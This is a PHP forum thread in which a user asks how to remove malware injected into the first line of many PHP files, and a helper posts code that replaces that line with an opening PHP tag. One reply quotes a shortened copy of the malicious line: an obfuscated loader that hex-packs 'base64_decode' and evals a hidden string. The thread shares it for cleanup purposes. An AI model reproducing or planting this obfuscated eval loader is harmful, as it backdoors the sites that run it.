Jump to content

Please help! removing first line of php

alexwtz

By alexwtz
in PHP Coding Help

 Share
Go to solution Solved by Ch0cu3r,

Recommended Posts

alexwtz Newbie

alexwtz

Posted
Posted

I want to remove first line of infected php files, but i want to keep <?php

I'd attached 2 files one with the infected file to see the first line, and one with a script that eliminates the first line, but i don't know how to keep the <?php... :(

 

a.php is the script for cleaning

update_cron.php

a.php

Link to comment
https://forums.phpfreaks.com/topic/287489-please-help-removing-first-line-of-php/
Share on other sites
Ch0cu3r Newbie

Ch0cu3r

Posted
Posted (edited)

If it is the very first line of any file you want to replace with just a <?php then use

$lines = file('path/to/file.php', FILE_IGNORE_NEW_LINES); // open the file and omit new lines from end of each line, each line will be feed into an array

$lines[0] = "<?php"; // Set the very first line to a <?php tag

file_put_contents('path/to/file.php', implode(PHP_EOL, $lines)); // implode the array, add in the newlines and write the contents back to the file
Edited by Ch0cu3r
alexwtz Newbie

alexwtz

Posted
  • Author
Posted

these is my function, and i put the code for new line but it dosen't work

function fix_files( $files ) {
	global $hack_str;
	foreach ( $files as $file ) {
		if ( is_array($file) ) {
			fix_files($file);
		}
		else { 
			$contents = explode("\n", file_get_contents($file));
			unset($contents[0]);
			$f = fopen($file, 'w');
			if ( $f ) {
				$the_content = implode($contents, "\n");
				$the_content = preg_replace('/^\\s/', '<?php', $the_content); // remove any leading whitespace.
				$lines[0] = "<?php"; // Set the first line to a <?php tag
				fwrite($f, $the_content, strlen($the_content));
				fclose($f);
				echo "Removed first line containing <code>" .  htmlentities($hack_str) ."</code>from $file...<br />";
			}
		} 
	}
}
Ch0cu3r Newbie

Ch0cu3r

Posted
Posted (edited)

You need to replace the code in the else statement with my three lines of code, something like

function fix_files( $files ) {
    global $hack_str;
    foreach ( $files as $file ) {
        if ( is_array($file) ) {
            fix_files($file);
        }
        else { 
            $lines = file($file, FILE_IGNORE_NEW_LINES);
            $lines[0] = "<?php"; // Set the first line to a <?php tag
            file_put_contents($file, implode(PHP_EOL, $lines));
            echo "Removed first line containing <code>" .  htmlentities($hack_str) ."</code>from $file...<br />";
            }
        } 
    }
}
Edited by Ch0cu3r
alexwtz Newbie

alexwtz

Posted
  • Author
Posted (edited)

it's ok but overides my firs line

 

these is the way i test it:

function fix_files( $files ) {
	global $hack_str;
	foreach ( $files as $file ) {
		if ( is_array($file) ) {
			fix_files($file);
		}
		else { 
			$contents = explode("\n", file_get_contents($file));
			unset($contents[0]);
			$f = fopen($file, 'w');
			if ( $f ) {
				$the_content = implode($contents, "\n");
				$the_content = preg_replace('/^\\s/', '<?php', $the_content); // remove any leading whitespace.
				fwrite($f, $the_content, strlen($the_content));
				fclose($f);
				$lines = file($file, FILE_IGNORE_NEW_LINES);
            			$lines[0] = "<?php"; // Set the first line to a <?php tag
            			file_put_contents($file, implode(PHP_EOL, $lines));
				echo "Removed first line containing <code>" .  htmlentities($hack_str) ."</code>from $file...<br />";
			}
		} 
	}
}

because i need to search many files to delete the code and put <?php, because i want just in the infected files to make these change

Edited by alexwtz
Ch0cu3r Newbie

Ch0cu3r

Posted
Posted (edited)

 

 

it's ok but overides my firs line

I dont understand? You have files which have code like this as the very first line (shortened for readability)

<?php /*versio:3.02*/ $GLOBALS["ktrmpz"]="PaUlQzT...iIpKSk7at";        if (!function_exists('tjjluyoc')){function tjjluyoc($a, $b){$c=$GLOBALS['ktrmpz'];$d=pack('H*','626173653634'.'5f6465636f6465'); return $d(substr($c, $a, $b));};eval(tjjluyoc(561,3272));};?><?php

and you want to remove it. My code replaces that code in the first line with a <?php. It is not meant to be used with your existing code! That is why I said to replace your code in the else statement with my code!

Edited by Ch0cu3r
alexwtz Newbie

alexwtz

Posted
  • Author
Posted (edited)

yes i have many infected php files and i want to clean the infected code.. the script a.php makes the search and deletes the line. but i need to insert a new line with <?php or replace the code line. in a.php at line 79 is the fix code, there i need a function that after the code delets the malware to insert or replace with <?php

 

the steps ar to search and then to change, because not all files are infected.

Edited by alexwtz
  • Solution
Ch0cu3r Newbie

Ch0cu3r

Posted
  • Solution
Posted

I have downloaded your a.php replaced your fix_files function with the code in my post here (although there was an error due to too many } in my code).

 

Then created a few test files, some with the infected code and some without. I then ran a.php and it removed the malicious code from the infected files.

 

So what is the issue now? I have attached the modified a.php here.

a.php

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.